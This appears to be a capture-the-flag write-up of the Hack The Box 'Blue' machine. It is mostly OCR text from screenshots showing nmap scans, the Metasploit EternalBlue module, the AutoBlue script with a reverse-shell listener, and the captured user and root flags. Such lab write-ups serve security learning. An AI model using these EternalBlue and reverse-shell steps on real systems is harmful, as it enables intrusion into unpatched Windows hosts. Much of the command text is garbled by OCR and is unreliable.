Blue – 10.10.10.40

Nmap:

Machine generated alternative text: # Nmap 7.70 scan initiated Tue may 21 2019 as: Nmap scan report for 10.10.10.40 Host is up (0.032s latency). nmap -sv -A -ON nmap. txt Not shown: 135/tcp 139/tcp 445/tcp UP) 49152/tcp 49153/tcp 49154/tcp 49155/tcp 49156/tcp 49157/tcp 991 closed ports STATE open open open open open open open open open SERVICE msrpc netbios-ssn microsoft-ds ms rpc ms rpc ms rpc ms rpc ms rpc ms rpc VERSION Microsoft Microsoft Windows 7 Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Windows RPC Windows netbios-ssn Professional 7601 Service Pack 1 microsoft-ds 16.10.10.40 (workgroup: WORKGRO Windows Windows Windows Windows Windows Windows RPC RPC R PC R PC RPC RPC Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 (98%), Microsoft Windows 10 1507 160 7 (96%), Microsoft Windows 7 SPO - SPI, Windows Server 2008 SPI, Windows Server 2008 R2, Windows 8, or W indows 8.1 Update 1 (96%), Microsoft Windows Vista Business (96%), Microsoft Windows Vista SPO or SPI (9 6%), Microsoft Windows Vista crosoft Windows 7 SPI (96%) , No exact OS matches for host Network Distance: 2 hops Service Info: Host: HARIS-PC; Host script results: clock-skew: mean: -29m27s, smb-os-discovery: SPI (96%), Microsoft Windows Vista SP2 (96%), Microsoft Windows 7 (96%), Mi Microsoft Windows 10 1703 (96%) (test conditions non-ideal) . OS: Windows; CPE: cpe: deviation: 34m36s, median: -9m28s OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) OS CPE: cpe:/o:microsoft:windows 7: Computer name: haris-PC NetBIOS computer name: HARIS-PCVOO workgroup: WORKGROUP\XOO system time: smb - security -mode : account used: guest authentication level: user challenge response: supported message signing: disabled (dangerous, but default) smb2-security-mode: 2.02: Message signing enabled but not required smb2-time: date: 2019-05-21 06:14:45 start date: 2019-05-21 06:11:15

Played around with smb but nothing came up really, let’s do some vuln scans

•p445 10.10. 10.46 starting Nmap 7.70 ( https://nmap.org ) Nmap scan report for 10.10.10.40 Host is up (0.037s latency) . PORT STATE SERVICE 445/ t cp open microsoft •ds Host script results: VULNERABLE : Remote Code Execution vulnerability state: VULNERABLE IDs: CVE:CVE-2017-0143 Risk factor: HIGH 10.10.4Ø-RETIRED* nmap ••script 2019-06-06 14:09 EDT Microsoft smBv1 servers (ms17-e1e) at in A critical remote code execution vulnerability exists in Microsoft SMBv1 servers (ms17•910) . Disclosure date: 2017-03-14 References: https://technet .mic rosoft.com/en-us/library/security/ms17-010.aspx https://cve . mi t - 2617 - 0143 https://blogs technet _ mic rosoft -wannacrypt-at tacks/

Alright we got one let’s exploit

Let’s try it both ways

  1. Msf console:
> use exploit/windows/smb/ms17 010 eternalblue > show options odule options (exploit/windows/smb/ms17_e10 Name RHOSTS RPORT SMBDomain SMBPass VERIFY ARCH VERIFY TARGET Exploit target; Name Current Setting Required 445 t rue t rue yes yes eternalblue) Description The target address range or CIDR identifier The target port (TCP) (optional) The windows domain to use for authentication (optional) The password for the specified username (Optional) The username to authenticate as Check if remote architecture matches exploit Target. Check if remote OS matches exploit Target. Hindows 7 and Server 2008 R2 (x64) All Service Packs

Since we have guest access and RPORT default is correct, we only need to set the RHOST right.

After running running this module we got shell as system -> root

dir Volume in drive C has no label. Volume Serial Number is AOEF•1911 04:20 03:23 17:58 14:48 07:56 21:21 07:56 07:56 07:56 14:45 Directory 14/07/2ee9 24/12/2017 14/07/2017 14/07/2017 21/07/2017 16/97/2017 Users cd Users C: \ Users>dir dir CDIR> CDIR> perfLoqs Program Files Program Files Share Users Windows bytes (x86) File(s) 6 Dir(s) Volume in drive C has no label. Volume Serial Number is AOEF•1911 Directory 21/07/2017 21/07/2017 21/07/2017 14/07/2017 12/04/2011 of CDIR> CDIR> 15,457,017,856 bytes tree Admi nist rator ha ris Public ø File(s) 5 Dir(s) 15 , 457 bytes .617,856 bytes free

Here we can see there are two users. Admin and haris, let’s first take the user flag.

c: \Usersscd haris cd harts C: Desktop cd Desktop c: user. txt more user-txt 4cS46aea7dbee75cbd71de24Scgdeea9

And as last take root flag

Administrator cd Administrator c: rator»dir dir Volume in drive C has no label. volume serial Number is AeEF•1911 07:56 07 07 03 : 22 07 : 56 07 07 07 07 07 07 07 07 Directory 21/07/2017 21/07/2017 21/07/2017 24,' 12/2017 21/01/2017 21/07/2017 21/07/2017 21/07/2017 21/07/2017 21/07/2017 21/07/2017 21/07/2017 21/07/2017 ot O File(s) Contacts Desktop Documents Down oads Favorites Links Music Pictures Saved Games Searches Videos e bytes 13 Dir(s) bytes Desktop cd Desktop c : nist dir Volume in drive C has no label. Volume Serial Number is AOEF-1911 Directory of 24/12/2017 24/12/2017 21/07/2017 03 : 22 03 07 1 File(s) 32 root. txt 32 bytes f ree f ree 2 Dir(s) bytes root. txt more root. txt
  1. The manual way.

First let us look up some known exploits in exploit-db using searchsploit

Exploit Titte Microsoft windows 7/2008 R2 • Microsoft windows 7/8.1/2008 Microsoft windows 8/8.1/2012 Shell codes: NO Result Paper Title searchsploit eternalblue I (/usr/share/exploitdb,•') 'Eternaldlue' SMB Remote Code Execution (MSI I exploits/windows/remote/42631.py 'Eternalelue' sma Remote I exploits/windows/remote/4231S .py R2/2012 R2,'2016 82 -10.10 -10.10 R2 (X64) - 'EternalB1ue• SMB Remote code How to Exploit ETERNAL BLUE and DOUBLEPULSAR on Windows 7/2668 How to Exploit ETERNALdLUE on windows server 2012 R2 Exec I exploits/windows x86-64,' remote/42030.p, / us r/share/exploi tdb• papers/ ) doc ish/41896• how to exploit •eternal blue docs/engIish/42280•how• to • exploit •eternalblue doc s/spanish/41897- I spanish] -how- to - exploit-et docs/ spanish/42281- I spanishl -how- to - exploit-et [Spanish] I Spanish] 4231S _py to Exploit ETERNALBLUE How to Exploit ETERNALBLUE and DOUBLEPULSAR on windows 7/ rootekati : —'Documents/HTB/Btue root@kati —'Documents/HTB/Btue rootekati : —'Documents/HTB/Btue-10.10.10 on .10 .10 windows server 2012 82 .40. RETIRED* mkdir exploit .40.RETIRED* cd exploit,' cp /usr/share/exploitdb/exploits/windows/remote/42315.pv

We found 42315.py and copied it to our working directory

Here we analyzed it and decided to look for an already adapted script. This one is a POC which creates a pwn.txt file in the root directory. We could change that ourself but why put in effort if there are ready to go scripts on github?

https://github.com/3ndG4me/AutoBlue-MS17-010

Downloaded it in our /opt directory and started the procedure.

  • Check if target is vulnerable (we know it is but we will still do the check)
Machine generated alternative text: root@ka Ll . Target OS: The target opt/Aut0Btue-M # pytnon eternal blue cnecker.py Windows 7 professional 7601 service Pack 1 is not patched Testing named pipes spoolss: STATUS ACCESS DENIED samr: STATUS ACCESS DENIED netlogon: STATUS ACCESS DENIED Isarpc: STATUS ACCESS DENIED browser: STATUS ACCESS DENIED

As we thought, target is vulnerable

  • Now we need to prep a shell, let’s do this
  1. Make the payload!

Go into the shellcode dir and execute the .shell_prep.sh

  2. Make the listener

Navigate to main dir and execute ./listener_prep.sh

Machine generated alternative text: Enternal Blue Metasploit Listener LHOST for reverse connection: 10.10. 14.16 LPORT for x64 reverse connection: 8844 L PORT for x86 reverse connection: 18845 Enter O for meterpreter shell or 1 for regular cmd shell: 1 Type O if this is a staged payload or I if it is for a stageless payload 1 starting listener (stageless) . [ ok ] Starting postgresql (via systemctl): postgresql.service.
  1. Ready to pwn
Machine generated alternative text: python eternalblue exploit7. py 10.10.10.40 shellcode/sc a ll. bin shell code size: 2203 numGroomConn: 13 Target OS: Windows 7 professional 7601 service Pack 1 SMBI session setup allocate nonpaged pool success SMBI session setup allocate nonpaged pool success good response status: INVALID PARAMETER done

After running this command a few times our shell has come through

Machine generated alternative text: ms f 5 exploit (multi [handler) .10.40:49160) at 2019-06-07 [ Command shell session 2 -0400 exploit (mutti/handter) > [ command shell session 1 opened (10.10.14.16:8844 -> 10.10 05:54:21 -0400 opened (10.10.14.16:8844 -> 10.10.10.40:49161) at 2019-06-07 05 > sessions -i 2 [ Starting interaction with 2... C : \Windows \ system32»whoami whoami nt authority\system

We know where the flags are and we have them already. Let’s seal this one.

User: 4c546aea7dbee75cbd71de245c8deea9

Root: ff548eb71e920ff6c08843ce9df4e717

ROOTED